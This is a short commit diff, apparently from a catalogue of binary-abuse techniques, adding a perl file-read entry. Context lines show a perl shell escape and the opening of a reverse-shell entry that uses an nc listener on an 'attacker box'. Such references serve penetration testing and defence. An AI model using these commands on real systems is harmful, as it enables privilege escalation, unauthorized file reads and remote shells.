Add perl file-read

master
Andrea Cardaci 2021-04-26 16:11:44 +02:00
parent d81463fb82
commit a9b046f74b
1 changed files with 4 additions and 0 deletions

View File

@ -2,6 +2,10 @@
functions:
shell:
- code: perl -e 'exec "/bin/sh";'
file-read:
- code: |
LFILE=file_to_read
perl -ne print $LFILE
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |